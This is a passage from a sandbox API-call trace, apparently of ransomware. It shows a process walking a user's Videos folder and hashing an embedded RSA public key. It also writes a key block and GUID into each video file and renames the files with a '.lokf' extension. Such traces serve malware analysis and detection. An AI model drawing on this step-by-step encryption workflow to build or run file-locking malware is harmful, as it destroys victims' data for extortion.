oyv277rnlff.avi.lokf")) returned 1 [0060.586] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.586] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.586] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.587] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4706bd0, ftCreationTime.dwHighDateTime=0x1d4cfff, ftLastAccessTime.dwLowDateTime=0x39bbbd90, ftLastAccessTime.dwHighDateTime=0x1d4c8c3, ftLastWriteTime.dwLowDateTime=0x39bbbd90, ftLastWriteTime.dwHighDateTime=0x1d4c8c3, nFileSizeHigh=0x0, nFileSizeLow=0x121a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aBWJz5OOK2UC2wWbUb-K.flv", cAlternateFileName="ABWJZ5~1.FLV")) returned 1 [0060.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.587] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\aBWJz5OOK2UC2wWbUb-K.flv") returned=".flv" [0060.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\aBWJz5OOK2UC2wWbUb-K.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\abwjz5ook2uc2wwbub-k.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.587] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=74145) returned 1 [0060.588] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.590] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1217b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.590] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.591] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.591] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x121a1, lpOverlapped=0x0) returned 1 [0060.591] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.591] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.591] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.591] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.592] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.592] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.592] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.592] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.592] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.592] GetLastError () returned 0x0 [0060.592] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.592] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.592] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.592] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.592] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.592] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.592] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.592] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.592] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x121a0) returned 0x9c8bae8 [0060.593] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89688 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ed8 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c896d0 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ef0 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f20 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f38 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.593] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f20 | out: hHeap=0x660000) returned 1 [0060.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f38 | out: hHeap=0x660000) returned 1 [0060.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f38 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85f20 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f38 | out: hHeap=0x660000) returned 1 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f20 | out: hHeap=0x660000) returned 1 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.594] GetCurrentThreadId () returned 0x9e0 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8b180 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.594] GetCurrentThreadId () returned 0x9e0 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f20 [0060.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f38 [0060.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f08 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f50 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f20 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f20 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.597] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x121a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.597] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.597] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.597] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.597] CloseHandle (hObject=0x5cc) returned 1 [0060.598] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.598] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.598] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\aBWJz5OOK2UC2wWbUb-K.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\abwjz5ook2uc2wwbub-k.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\aBWJz5OOK2UC2wWbUb-K.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\abwjz5ook2uc2wwbub-k.flv.lokf")) returned 1 [0060.599] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad6a9540, ftCreationTime.dwHighDateTime=0x1d4c896, ftLastAccessTime.dwLowDateTime=0xd5fcc430, ftLastAccessTime.dwHighDateTime=0x1d4d0b4, ftLastWriteTime.dwLowDateTime=0xd5fcc430, ftLastWriteTime.dwHighDateTime=0x1d4d0b4, nFileSizeHigh=0x0, nFileSizeLow=0x3d63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r00ipKmOR8h.mkv", cAlternateFileName="R00IPK~1.MKV")) returned 1 [0060.600] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\r00ipKmOR8h.mkv") returned=".mkv" [0060.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\r00ipKmOR8h.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\r00ipkmor8h.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.600] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=15715) returned 1 [0060.600] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.602] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3d3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.602] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.603] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x3d63, lpOverlapped=0x0) returned 1 [0060.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.603] lstrlenA (lpString="-----BEGIN PUBLIC 